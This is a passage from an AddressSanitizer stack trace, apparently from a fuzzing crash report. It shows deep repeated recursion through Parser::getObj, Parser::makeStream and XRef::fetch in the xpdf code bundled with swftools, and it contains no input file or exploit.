/home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1704 #5 0x60abb7 in error(int, char*, ...) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Error.cc:29:5 #6 0x65c6e9 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:76:2 #7 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #8 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #9 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #10 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #11 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #12 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #13 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #14 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #15 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #16 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #17 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #18 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #19 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #20 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #21 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #22 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #23 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #24 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #25 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #26 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #27 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #28 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #29 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #30 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #31 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #32 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #33 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #34 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #35 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #36 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #37 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #38 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #39 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #40 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #41 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #42 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #43 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #44 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #45 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #46 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #47 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #48 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #49 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #50 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #51 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #52 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #53 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #54 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #55 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #56 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #57 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #58 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #59 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #60 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #61 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #62 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #63 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #64 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #65 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #66 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #67 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #68 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #69 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #70 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #71 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #72 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #73 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #74 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #75 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #76 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #77 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #78 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #79 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #80 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #81 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #82 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #83 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #84 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #85 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #86 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #87 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #88 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #89 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #90 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #91 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #92 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #93 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #94 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #95 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #96 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #97 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #98 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #99 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #100 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #101 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #102 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #103 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #104 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #105 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #106 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #107 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #108 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #109 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #110 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #111 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #112 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #113 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #114 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #115 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #116 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #117 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #118 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #119 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #120 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #121 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #122 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #123 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #124 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #125 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #126 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #127 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #128 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #129 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #130 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #131 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #132 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #133 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #134 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #135 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #136 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #137 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #138 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #139 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #140 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #141 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #142 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #143 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #144 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #145 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #146 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #147 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #148 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #149 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #150 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #151 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #152 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #153 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #154 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #155 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #156 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #157 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #158 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #159 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #160 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #161 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #162 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #163 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #164 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #165 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #166 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #167 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #168 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #169 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #170 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #171 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #172 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #173 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #174 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #175 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #176 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #177 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #178 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #179 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #180 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #181 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #182 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #183 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #184 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #185 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #186 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #187 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #188 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #189 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #190 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #191 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #192 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #193 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #194 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #195 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #196 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #197 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #198 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #199 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #200 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #201 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #202 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #203 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #204 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #205 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) 